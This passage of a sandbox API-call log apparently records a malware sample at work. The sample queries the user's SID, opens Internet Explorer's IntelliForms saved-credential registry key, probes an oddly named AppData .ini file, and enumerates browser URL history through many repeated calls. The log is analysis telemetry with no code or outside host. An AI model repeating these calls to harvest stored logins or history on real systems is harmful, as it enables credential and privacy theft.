ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14d708 | out: TokenHandle=0x14d708*=0xf8) returned 0x0 [0169.624] NtQueryInformationToken (in: TokenHandle=0xf8, TokenInformationClass=0x1, TokenInformation=0x14cf00, TokenInformationLength=0x400, ReturnLength=0x14d700 | out: TokenInformation=0x14cf00, ReturnLength=0x14d700) returned 0x0 [0169.624] ConvertSidToStringSidW (in: Sid=0x14cf08*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x14d704 | out: StringSid=0x14d704*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0169.624] NtClose (Handle=0xf8) returned 0x0 [0169.624] NtCreateKey (in: KeyHandle=0x14e61c, DesiredAccess=0x20219, ObjectAttributes=0x14d704*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e61c*=0xf8) returned 0x0 [0169.624] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logri.ini", NtPathName=0x14d600, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.624] NtCreateFile (in: FileHandle=0x14d620, DesiredAccess=0x120089, ObjectAttributes=0x14d5e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14d608, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14d620*=0x0, IoStatusBlock=0x14d608*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.625] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0169.744] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1f4400) returned 0x4540020 [0169.774] CoInitialize (pvReserved=0x0) returned 0x0 [0169.794] CoCreateInstance (in: rclsid=0x14d714*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x14d724*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x14d73c | out: ppv=0x14d73c*=0x779e30) returned 0x0 [0173.504] IUrlHistoryStg:EnumUrls (in: This=0x779e30, ppenum=0x14d738 | out: ppenum=0x14d738*=0x77a078) returned 0x0 [0173.507] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x14eeb0 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.315] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.318] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.318] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.318] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.319] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.319] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.320] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.320] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.320] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.320] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.321] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.321] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.321] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.321] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.322] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.322] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.322] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.322] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.323] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.323] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.323] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.324] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.324] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.324] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.325] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.325] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.325] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.326] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.326] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.326] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.326] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.327] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.327] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.327] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.327] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.328] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.328] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.328] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.329] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.329] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.329] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.329] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.330] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.330] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.330] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.330] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.331] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.331] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.331] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.331] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.332] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.333] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.333] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.333] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.333] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.334] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.334] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.334] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.334] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.334] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.335] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.335] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.335] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.336] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.336] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.336] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.337] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.337] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.337] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.337] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.337] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.338] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.338] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.338] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.338] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.339] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.339] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.339] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.339] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.340] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.341] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.341] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.341] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.342] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.342] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.342] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.342] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.342] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.343] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.343] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.343] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.343] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.343] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.344] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.345] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.345] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.345] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.345] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.345] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.346] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.346] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.346] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.347] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.347] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.347] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1 | out: rgelt=0x14d6ec, pceltFetched=0x14d734*=0x1) returned 0x0 [0174.347] IEnumSTATURL:Next (in: This=0x77a078, celt=0x1, rgelt=0x14d6ec, 